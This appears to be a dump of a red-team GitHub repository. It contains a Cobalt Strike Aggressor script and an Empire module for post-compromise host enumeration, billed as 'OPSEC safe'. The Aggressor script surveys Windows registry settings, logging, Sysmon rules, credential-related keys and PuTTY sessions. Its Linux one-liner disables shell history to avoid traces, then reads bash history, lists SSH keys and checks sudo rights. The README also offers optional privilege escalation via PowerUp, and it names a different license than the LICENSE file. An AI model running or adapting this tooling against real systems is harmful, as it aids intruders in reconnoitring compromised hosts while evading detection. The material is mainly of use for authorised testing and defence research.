├── .gitignore ├── HostEnum.ps1 ├── LICENSE ├── README.md ├── enumerate.cna └── hostenum.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | *.html 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *,cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # IPython Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # dotenv 80 | .env 81 | 82 | # virtualenv 83 | venv/ 84 | ENV/ 85 | 86 | # Spyder project settings 87 | .spyderproject 88 | 89 | # Rope project settings 90 | .ropeproject 91 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Threat Express 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red Team Scripts 2 | --- 3 | Red Team Scripts is a collection of red teaming related tools, scripts, techniques, and notes developed or discovered over time during engagements. 4 | Related tool release blog posts can be found at [Threat Express](http://threatexpress.com) an Information Security and Red Teaming Blog 5 | 6 | ## Situational Awareness 7 | 8 | **Perform situational awareness on a local host or domain upon initial compromise.** 9 | 10 | ### `enumerate.cna` 11 | 12 | Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell, binary calls, or process injection). Additionally, adds a basic `enumerate` alias for Linux based systems in SSH sessions. 13 | 14 | 15 | ### `Invoke-HostEnum` 16 | 17 | **Author:** Andrew Chiles (@andrewchiles) with code by harmj0y, Joe Bialek, rvrsh3ll, Beau Bullock, Tim Medin 18 | 19 | A PowerShell v2.0 compatible script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain, it can also perform limited domain enumeration with the -Domain switch. However, domain enumeration is significantly limited with the intention that PowerView or BoodHound could also be used. 20 | 21 | **Enumerated Information:** 22 | 23 | - OS Details, Hostname, Uptime, Installdate 24 | - Installed Applications and Patches 25 | - Network Adapter Configuration, Network Shares, Connections, Routing Table, DNS Cache 26 | - Running Processes and Installed Services 27 | - Interesting Registry Entries 28 | - Local Users, Groups, Administrators 29 | - Personal Security Product Status 30 | - Interesting file locations and keyword searches via file indexing 31 | - Interesting Windows Logs (User logins) 32 | - Basic Domain enumeration (users, groups, trusts, domain controllers, account policy, SPNs) 33 | 34 | **Privilege Escalation** 35 | 36 | Optionally performs Privilege Escalation functions from PowerUp in the PowerSploit project. 37 | 38 | **Empire 2.0 Integration** 39 | 40 | Use the accompanying hostenum.py script to include Invoke-HostEnum as post-exploitation situational awarness module in Empire. Both files need to be copied to the appropriate locations in Empire. 41 | 42 | **Credits:** 43 | 44 | Several functions are inspired or pulled directly from the following projects and are referenced in the code where applicable: 45 | 46 | - [Invoke-HostRecon](https://raw.githubusercontent.com/dafthack/HostRecon/master/HostRecon.ps1) by Beau Bullock 47 | - [Get-ComputerDetails](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Get-ComputerDetails.ps1) from Joe Bialek in PowerSploit 48 | - [Get-BrowserInformation](https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Get-BrowserData.ps1) by rvrsh3ll 49 | - [Get-UserSPNS](https://github.com/nidem/kerberoast) by Tim Medin 50 | - [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) by @harmj0y 51 | 52 | ## Usage 53 | 54 | Refer to the help and comments in each script for detailed usage information. 55 | 56 | ## License 57 | 58 | This project and all individual scripts are under the BSD 3-Clause license 59 | 60 | ## Links 61 | 62 | [threatexpress.com](http://threatexpress.com) 63 | http://threatexpress.com/blogs/2018/hostenum-updates-usage/ 64 | http://threatexpress.com/blogs/2017/invoke-hostenum/ 65 | -------------------------------------------------------------------------------- /enumerate.cna: -------------------------------------------------------------------------------- 1 | # Aggressor automated Windows Host Profiling using Beacon's built-in commands 2 | # @andrewchiles 3 | # https://github.com/threatexpress/red-team-scripts 4 | # References: 5 | # https://gist.github.com/HarmJ0y/fe676e3ceba74f22a28bd1b121182db7 6 | # https://github.com/leechristensen/Random/blob/master/PowerShellScripts/Get-HostProfile.ps1: 7 | # https://github.com/threatexpress/red-team-scripts/blob/master/HostEnum.ps1 8 | # Load enumerate.cna into Cobalt Strike and issue the `enumerate` command on a Beacon or SSH session 9 | 10 | sub enumerate_windows { 11 | $username = beacon_info($1,"user"); 12 | 13 | bpwd($1); 14 | bdrives($1); 15 | bps($1); 16 | 17 | # Local File Locations 18 | bls($1,"C:\\"); 19 | bls($1,"C:\\Program Files"); 20 | bls($1,"C:\\Program Files \(x86\)"); 21 | bls($1,"C:\\ProgramData"); 22 | bls($1,"C:\\Users\\".$username."\\Documents"); 23 | bls($1,"C:\\Users\\".$username."\\Desktop"); 24 | bls($1,"C:\\Users\\".$username."\\Downloads"); 25 | bls($1,"C:\\Users\\".$username."\\AppData\\Roaming"); 26 | bls($1,"C:\\Users\\".$username."\\AppData\\Local"); 27 | bls($1,"C:\\Users\\".$username."\\AppData\\Roaming\\Microsoft\\Windows\\Recent"); 28 | 29 | # .NET CLR Installed Versions 30 | bls($1,"C:\\Windows\\Microsoft.Net\\Framework"); 31 | 32 | # .NET CLR 2.0 installed 33 | #bls($1,"C:\\Windows\\Microsoft.Net\\Framework\\v2.0.50727"); 34 | 35 | # .NET CLR 4.0 installed 36 | #bls($1,"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319"); 37 | 38 | # Potential Mapped Drives 39 | bls($1,"E:\\"); 40 | bls($1,"F:\\"); 41 | bls($1,"G:\\"); 42 | bls($1,"Z:\\"); 43 | 44 | # Operating System 45 | breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x64"); 46 | breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "CurrentVersion", "x64"); 47 | breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "CurrentBuild", "x64"); 48 | breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "RegisteredOrganization", "x64"); 49 | breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "RegisteredOwner", "x64"); 50 | 51 | # System Hardware/BIOS 52 | breg_query($1, "HKLM\\HARDWARE\\DESCRIPTION\\System", "x64"); 53 | breg_query($1, "HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS", "x64"); 54 | 55 | # System Policies 56 | breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies", "x64"); 57 | breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "x64"); 58 | breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit", "x64"); 59 | breg_query($1, "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "x64"); 60 | 61 | # Powershell Version 2 62 | breg_query($1, "HKLM\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "x64"); 63 | 64 | # Powershell Version 5 65 | breg_query($1, "HKLM\\Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", "x64"); 66 | 67 | # Powershell Logging 68 | breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Powershell", "x64"); 69 | breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Powershell\\Transcription", "x64"); 70 | breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Powershell\\ScriptBlockLogging", "x64"); 71 | breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Powershell\\ModuleLogging", "x64"); 72 | 73 | # Recently Typed Commands and URLS 74 | breg_query($1, "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU", "x64"); 75 | breg_query($1, "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs", "x64"); 76 | 77 | # Installed Software 78 | breg_query($1, "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "x86"); 79 | breg_query($1, "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "x64"); 80 | 81 | # Installed Services 82 | breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Services","x64"); 83 | 84 | # Mapped Drives 85 | breg_query($1, "HKCU\\Network", "x64"); 86 | breg_query($1, "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2", "x64"); 87 | 88 | # Environment Variables 89 | 90 | breg_query($1, "HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "x64"); 91 | breg_query($1, "HKCU\\Environment", "x64"); 92 | 93 | # Internet Explorer Proxy Settings 94 | breg_query($1,"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"); 95 | breg_query($1,"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"); 96 | breg_query($1,"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections"); 97 | 98 | # Firewall Profiles 99 | breg_query($1,"HKLM\\System\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile", "x64"); 100 | breg_query($1,"HKLM\\System\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile", "x64"); 101 | breg_query($1,"HKLM\\System\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile", "x64"); 102 | 103 | 104 | # LSA Settings 105 | breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", "x64"); 106 | breg_query($1, "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "x64"); 107 | 108 | # Secure Boot 109 | breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecureBoot\\State", "x64"); 110 | 111 | # LAPS Admin Password Management 112 | breg_query($1, "HKLM\\Software\\Policies\\Microsoft Services\\AdmPwd", "x64"); 113 | 114 | # Windows Installer 115 | breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer", "x64"); 116 | breg_query($1, "HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer", "x64"); 117 | 118 | # Event Log Forwarding 119 | breg_query($1, "HKLM\\Software\\Policies\\Microsoft\\Windows\\EventLog\\EventForwarding\\SubscriptionManager", "x64"); 120 | 121 | # Winlogon (AutoLogon, AutoLogin, ScreenSaverGrace) 122 | breg_query($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "x64"); 123 | 124 | # Windows Update 125 | breg_query($1, "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate", "x64"); 126 | breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\CCMSetup", "x64"); 127 | breg_query($1, "HKLM\\SOFTWARE\\Microsoft\\SMS\\Mobile Client", "x64"); 128 | 129 | # LANMAN 130 | breg_query($1, "HKLM\\System\\CurrentControlSet\\Services\\LanManServer\\Parameters", "x64"); 131 | breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\DefaultSecurity", "x64"); 132 | 133 | # Wdigest 134 | breg_query($1, "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest", "x64"); 135 | 136 | # Kerberos 137 | breg_query($1, "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Kerberos\\Parameters", "x64"); 138 | 139 | # Service Group Order 140 | breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Control\\ServiceGroupOrder\\Security", "x64"); 141 | 142 | # Software Specific 143 | # Putty 144 | breg_query($1, "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions", "x64"); 145 | breg_query($1, "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions", "x86"); 146 | 147 | # Sysmon 148 | breg_query($1, "HKLM\\SYSTEM\\CurrentControlSet\\Services\\SysmonDrv\\Parameters", "x64"); 149 | breg_queryv($1, "HKLM\\SYSTEM\\CurrentControlSet\\Services\\SysmonDrv\\Parameters", "Rules", "x64"); 150 | 151 | } 152 | 153 | sub enumerate_linux { 154 | # Bash one-liner for host enumeration 155 | local('$commands'); 156 | local('$encoded'); 157 | 158 | $commands = " unset HISTFILE HISTFILESIZE HISTSIZE;hostname;w;uname -a;date;date -u;cat /etc/*-release;env;lastlog 2>/dev/null;ls -al /home ~ ~/.ssh /tmp /dev/shm;df -h;mount;sudo -l;cat ~/.bash_history ~/.known_hosts /etc/hosts /etc/resolv.conf;ifconfig -a; ps aux; netstat -pantl"; 159 | 160 | #$encoded = "echo " . base64_encode($commands) . "|base64 -d|bash"; 161 | #bpinut($1, "\c0Executing the following commands: " . $commands); 162 | #bshell($1, $encoded); 163 | 164 | bshell($1, $commands); 165 | 166 | } 167 | 168 | beacon_command_register( 169 | "enumerate", 170 | "Perform OPSEC safe host enumeration with built-in commands", 171 | "Use: enumerate\n\nPerform Windows host enumeration with OPSEC safe techniques."); 172 | 173 | alias enumerate { 174 | btask($1, "\c0Performing Windows host enumeration! (OPSEC Safe)", "T1082"); 175 | enumerate_windows($1); 176 | 177 | } 178 | 179 | ############## 180 | # SSH Alias 181 | ############## 182 | 183 | ssh_command_register( 184 | "enumerate", 185 | "Perform OPSEC safe host enumeration with built-in commands", 186 | "Use: enumerate\n\nPerform Linux host enumeration with OPSEC safe techniques."); 187 | 188 | ssh_alias enumerate { 189 | btask($1, "\c0Performing Linux host enumeration! (OPSEC Safe)", "T1082"); 190 | enumerate_linux($1); 191 | } 192 | -------------------------------------------------------------------------------- /hostenum.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'HostEnum', 9 | 10 | 'Author': ['@andrewchiles'], 11 | 12 | 'Description': ('Performs detailed enumeration of the local system in the current user content.' 13 | 'Optionally performs Privesc checks and basic Windows Domain enumeration.'), 14 | 15 | 'Background' : True, 16 | 17 | 'OutputExtension' : None, 18 | 19 | 'NeedsAdmin' : False, 20 | 21 | 'OpsecSafe' : True, 22 | 23 | 'Language': 'powershell', 24 | 25 | 'MinLanguageVersion': '2', 26 | 27 | 'Comments': [ 28 | 'https://github.com/threatexpress/red-team-scripts' 29 | ] 30 | } 31 | 32 | # any options needed by the module, settable during runtime 33 | self.options = { 34 | # format: 35 | # value_name : {description, required, default_value} 36 | 'Agent' : { 37 | 'Description' : 'Agent to run module on.', 38 | 'Required' : True, 39 | 'Value' : '' 40 | }, 41 | 'Local' : { 42 | 'Description' : 'Perform local Windows enumeration functions.', 43 | 'Required' : False, 44 | 'Value' : '' 45 | }, 46 | 'Domain' : { 47 | 'Description' : 'Perform additional Windows Domain enumeration functions.', 48 | 'Required' : False, 49 | 'Value' : '' 50 | }, 51 | 'Privesc' : { 52 | 'Description' : 'Perform additional privilege escalation checks (PowerUp).', 53 | 'Required' : False, 54 | 'Value' : '' 55 | }, 56 | 'Quick' : { 57 | 'Description' : 'Perform a quick system survey.', 58 | 'Required' : False, 59 | 'Value' : '' 60 | }, 61 | 'HTMLReport' : { 62 | 'Description' : 'Create an HTML formatted report in current directory.' 63 | 'Output filename convention is YYYYMMDD_HHMMSS_HOSTNAME.html', 64 | 'Required' : False, 65 | 'Value' : '' 66 | } 67 | } 68 | 69 | # save off a copy of the mainMenu object to access external functionality 70 | # like listeners/agent handlers/etc. 71 | self.mainMenu = mainMenu 72 | 73 | for param in params: 74 | # parameter format is [Name, Value] 75 | option, value = param 76 | if option in self.options: 77 | self.options[option]['Value'] = value 78 | 79 | 80 | def generate(self): 81 | 82 | # read in the common module source code 83 | moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/HostEnum.ps1" 84 | 85 | try: 86 | f = open(moduleSource, 'r') 87 | except: 88 | print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) 89 | return "" 90 | 91 | moduleCode = f.read() 92 | f.close() 93 | 94 | script = moduleCode 95 | 96 | script += "Invoke-HostEnum " 97 | 98 | # add any arguments to the end execution of the script 99 | for option,values in self.options.iteritems(): 100 | if option.lower() != "agent": 101 | if values['Value'] and values['Value'] != '': 102 | if values['Value'].lower() == "true": 103 | # if we're just adding a switch 104 | script += " -" + str(option) 105 | else: 106 | script += " -" + str(option) + " " + str(values['Value']) 107 | 108 | return script 109 | --------------------------------------------------------------------------------